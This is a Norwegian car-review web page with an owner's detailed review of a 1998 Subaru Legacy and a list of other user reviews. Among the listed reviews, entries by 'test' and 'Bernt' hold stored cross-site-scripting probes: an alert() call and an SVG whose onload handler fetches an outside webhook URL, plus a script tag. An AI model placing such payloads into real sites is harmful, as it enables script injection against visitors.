Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
1998 Subaru Legacy 2,0 GL Am Stasjonsvogn 4

Vurdert av PerChristianH

Score 7.8/10

1998 Subaru Legacy er en artig, interessant og god bil med sjel. Denne bilen kan du stole på til alle oppdrag, uansett årstid og uansett føre. Den er god å kjøre, grei kjørekomfort og overraskende sprek motor for 2L med 116HK. Du kan fint nyte langturer på motorveien, eller svingete landeveier. Bilen sitter godt på veien og er forutsigbar for grep og reaksjoner mot underlaget. Selv om bilen er en "vanlig" stasjonsvogn er den som nevnt overraskende sprek, og morro å kjøre både under rolig kjøring samt mer intens kjøring. Bilen er også enkel å vedlikeholde, og er bygget på typisk 90-talls/tidlig 2000-talls løsninger som du enkelt skrur og fikser selv fremfor å dra på verksted. <br /> <br /> Den manuelle 5-trinns girkassen er ikke en "quick-shift" kasse, men man venner seg til kassens humør og væremåte noe som også påvirker kjørestilen. Denne humørsvinger gjerne etter temperaturen ute og driftstemperatur på bilen. Det gøye med boxermotor er at den gjerne er turtallsvillig og du kan gi på litt ekstra før du må gire. Siden den har manuell girkasse har den også mekanisk Høy-Lav serie på girkassen noe som låser AWD systemet mer tight og gir en suveren fremkommelighet uansett underlag! (Tro meg, jeg har prøvd det meste). Den har også automatisk hill-holder funksjon som funker overraskende bra, selv på vinterføre. Ved kjøring på snø og is oppleves bilen trygg og stabil. Dette har selvfølgelig også med dekkvalg å gjøre, men med gode kvalitetsdekk kan du enkelt føle hvordan bilen beveger seg på snøen og det er enkelt å kontrollere bilen dersom den plutselig skulle glippe underlaget litt. <br /> <br /> Positive områder:<br /> Morro kjøremaskin med overlegen fremkommelighet. Stort bagasjerom med smarte oppbevaringsløsninger på sidene og under gulvet. Kan legge ned setene i 2 ulike posisjoner for ekstra plass og stabilitet på lengre gjenstander. Også plass å sove i bilen på denne måten. Billige deler sammenlignet med nye biler. Detaljert instruksjonsbok med gode instrukser og veiledninger for vedlikehold hjemme. En annerledes og unik bil som vekker interesse blant folk. <br /> <br /> Negative/Mindre bra områder: <br /> Førersetene er grei, men ved kjøring over 3-4 timer kan de bli noe harde og du får lyst på en strekk. Beinplassen i baksetet kan være litt kort for de med lange bein, spesielt hvis fremsetene er dratt litt bak, men er stort sett ikke et problem for de fleste. Ved temperaturer under 0 grader kan bilen oppleves noe kald fra gulvet pga noe tynn isolering, men dette fikses enkelt ved å skru opp temperaturen på varmeapparatet og rette luften mot beina. Noen områder på Subaruer er ekstra utsatt for rust pga stålkvaliteten. Hvis disse ikke vedlikeholdes/skylles/behandles kan disse ruste i stykker.

Kjøreglede

9 / 10
En bil med sjel, og medfølgende kjøreopplevelse. Komfortabel og forutsigbar under alle værforhold.

Kvalitet/driftssikkerhet

8 / 10
Tar man vare på ting og gjør mindre vedlikehold fra tid til annen holder ting lengre. Eldre ivaretatte Subaruer er eksempel på dette. Mye er enkelt å vedlikeholde selv.

Plass/praktiske løsninger

8 / 10
MYE plass til oppbevaring, stort bagasjerom og gode pakkemuligheter til ferietur. Beinplass i baksetet kan være et minus på langtur om man har lange bein.

Økonomi/kostnader

8 / 10
Relativt billige reservedeler. Både slitedeler og andre komponenter.

Drivstoff/forbruk

6 / 10
Noe høyt drivstofforbruk på grunn av AWD og boxermotor. Snitt på 0,7-0,9L/mil ved langkjøring og snitt på 0,9-1.1L/mil ved mye småkjøring. På vinter kan det forekomme 1.2L/mil ved mye småkjøring.

Flere vurderinger

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans

BMW 3-Serie (2012)

Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat

Score 8.8

Vurdert av Knappertappen